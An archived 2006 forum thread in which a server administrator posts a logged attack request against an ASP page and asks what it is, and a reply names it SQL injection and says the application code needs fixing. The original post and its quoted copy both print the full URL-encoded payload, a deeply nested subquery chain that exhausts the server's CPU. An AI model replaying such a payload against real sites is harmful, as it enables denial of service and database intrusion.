some kindof attack?

TheMSsForum.com: The Microsoft Software Forum

hi there one of the domain on our server had attack below, we have stopped
it by checking if id variable is a number although our server is win2003
with latest patches this code seems exploiting it and puts it some kind of
loop that until stop the domain continues eating cpu , any one knows what
its called and permanent resolution?

attacker uset fllowing


/page.asp
show=single&id=190%20and%201=(select%20id%20from%20elestiriler%20where%20id=
(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestir
iler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20i
d%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wher
e%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20
elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sel
ect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler
%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20
from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20
id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20eles
tiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%
20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20w
here%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from
%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(
select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiri
ler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id
%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where
%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20e
lestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sele
ct%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%
20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20f
rom%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20i
d=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elest
iriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%2
0id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wh
ere%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%
20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(s
elect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiril
er%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%
20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%
20id=(select%20id%20from%20elestiriler%20where%20id=id/123*22213))))))))))))
)))))))))))))))))))))))))))))))))))))

--
______________________________________________________________________
Top

Re: some kindof attack? by Kristofer

Kristofer
Tue May 02 16:03:26 CDT 2006

Hello,

It is called SQL Injection, and it succeeds because your web application
is not properly secured against this kind of attack (i.e. the developers
of your web application did not do their job).

Permanent solution is to re-code your application and make sure that this
does not succeed. There is nothing in IIS you can do about it, because the
vulnerability is not in IIS (IIS does not interpret query strings, your
web application does), it is in your custom-made web application.

For more information on SQL Injection, and how to protect yourself against
it, search for the term "SQL Injection" using your favorite search engine
on the Internet.

This may also be of some interest:

http://blogs.msdn.com/david.wang/archive/2005/07/18/Why_URLScan_ignores_querystring_for_DenyUrlSequences.aspx


--
Regards,
Kristofer Gafvert
http://www.gafvert.info/iis/ - IIS Related Info


noLoveLusT wrote:

>hi there one of the domain on our server had attack below, we have stopped
>it by checking if id variable is a number although our server is win2003
>with latest patches this code seems exploiting it and puts it some kind of
>loop that until stop the domain continues eating cpu , any one knows what
>its called and permanent resolution?
>
>attacker uset fllowing
>
>
>/page.asp
>show=single&id=190%20and%201=(select%20id%20from%20elestiriler%20where%20id=
>(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestir
>iler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20i
>d%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wher
>e%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20
>elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sel
>ect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler
>%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20
>from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20
>id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20eles
>tiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%
>20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20w
>here%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from
>%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(
>select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiri
>ler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id
>%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where
>%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20e
>lestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(sele
>ct%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%
>20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20f
>rom%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20i
>d=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elest
>iriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%2
>0id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20wh
>ere%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%20from%
>20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(s
>elect%20id%20from%20elestiriler%20where%20id=(select%20id%20from%20elestiril
>er%20where%20id=(select%20id%20from%20elestiriler%20where%20id=(select%20id%
>20from%20elestiriler%20where%20id=(select%20id%20from%20elestiriler%20where%
>20id=(select%20id%20from%20elestiriler%20where%20id=id/123*22213))))))))))))
>)))))))))))))))))))))))))))))))))))))
Top